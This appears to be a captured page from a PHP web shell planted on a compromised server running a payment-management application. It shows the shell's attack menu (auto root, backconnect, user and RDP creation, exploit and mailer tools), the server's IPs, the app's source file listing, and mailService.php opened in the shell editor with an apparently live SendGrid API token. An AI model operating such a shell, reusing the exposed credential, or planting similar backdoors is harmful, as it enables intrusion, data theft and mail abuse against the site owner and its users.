Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 52.15.99.234
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
pms /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
approve.php
11.58
KB
-rw-rw-r--
bank.php
4.12
KB
-rwxrwxrwx
caccesscontext.php
1.28
KB
-rwxrwxr-x
cappcontext.php
2.71
KB
-rwxrwxr-x
consultant.php
3.59
KB
-rwxrwxrwx
coutput.php
1.84
KB
-rwxrwxr-x
crequestbroker.php
2.49
KB
-rwxrwxr-x
csessions.php
548
B
-rwxrwxr-x
cuser.php
3.53
KB
-rwxrwxr-x
excelapprove.php
1.39
KB
-rw-r--r--
invoice.php
7.78
KB
-rw-rw-r--
json.php
34.52
KB
-rwxrwxr-x
login.php
8.64
KB
-rwxrwxr-x
mailService.php
1.36
KB
-rw-rw-r--
makepayment.php
13.06
KB
-rwxrwxrwx
mregistry.php
3.86
KB
-rwxrwxr-x
searchpms.php
3.54
KB
-rw-r--r--
supplier.php
4.14
KB
-rwxrwxrwx
uploadexcel.php
20.49
KB
-rw-r--r--
users.php
3.9
KB
-rwxrwxrwx
verify.php
7.57
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mailService.php
<?php error_reporting(E_ALL); /*$json_string = array( 'to' => array( 'example1@sendgrid.com', 'example2@sendgrid.com' ), 'category' => 'test_category' ); */ function sendGridMail($to, $subject, $html) { $url = 'https://api.sendgrid.com/'; $token = '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'; $params = array( 'to' => $to, 'subject' => $subject, 'html' => $html, 'from' => 'support@uniclare.com', ); // var_dump($params); $request = $url . 'api/mail.send.json'; $headr = array(); $headr[] = 'Authorization: Bearer ' . $token; // Generate curl request $session = curl_init($request); // Tell curl to use HTTP POST curl_setopt($session, CURLOPT_POST, true); // Tell curl that this is the body of the POST curl_setopt($session, CURLOPT_POSTFIELDS, $params); // Tell curl not to return headers, but do return the response curl_setopt($session, CURLOPT_HEADER, false); // Tell PHP not to use SSLv3 (instead opting for TLS) //curl_setopt($session, CURLOPT_SSLVERSION, CURL_SSLVERSION_TLSv1_2); curl_setopt($session, CURLOPT_RETURNTRANSFER, true); curl_setopt($session, CURLOPT_HTTPHEADER, $headr); // obtain response $response = curl_exec($session); curl_close($session); // print everything out return $response; }
Close